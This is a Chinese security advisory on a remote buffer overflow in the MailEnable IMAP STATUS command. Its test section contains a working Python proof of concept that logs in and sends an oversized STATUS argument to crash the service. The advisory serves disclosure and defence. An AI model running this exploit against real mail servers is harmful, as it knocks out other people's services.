安全研究

安全漏洞
MailEnable IMAP STATUS命令超长参数远程缓冲区溢出漏洞

发布日期:2004-05-13
更新日期:2004-05-13

受影响系统:
MailEnable MailEnable Professional 1.x
MailEnable MailEnable Enterprise Edition 1.x
描述:
CVE(CAN) ID: CVE-2005-2278

MailEnable's Mail Server是一款提供企业级的邮件平台,MailEnable Proferssional IMAP服务允许用户拥有服务器的文件夹。

MailEnable IMAP服务在处理STATUS命令请求的参数时存在缓冲区溢出漏洞,远程攻击者可以利用此漏洞执行缓冲区溢出或拒绝服务攻击。

<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#
# POC about imapd mailenable bug in status command
#

import sys
import imaplib

class poc:

      def __init__(self,host,loginimap,passimap):
            self.host=host
            self.loginimap=loginimap
            self.passimap=passimap

      def exploit(self):
            print "Please wait"
        
            connect = imaplib.IMAP4(self.host)
            connect.login(self.loginimap,self.passimap)
            nops='\x00'
            nops+='\x90'*10540
            try:
                  typ, data = connect.status(nops,'(UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)')
            except Exception,e:
                  print "Service down!"
            return 0    

if(len(sys.argv) < 4):
    print "Need 3 arguments, ./poc.py host user pass"
    sys.exit(1)

exp=poc(sys.argv[1],sys.argv[2],sys.argv[3])
exp.exploit()

建议:
厂商补丁:

MailEnable
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mailenable.com/

浏览次数:3306
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障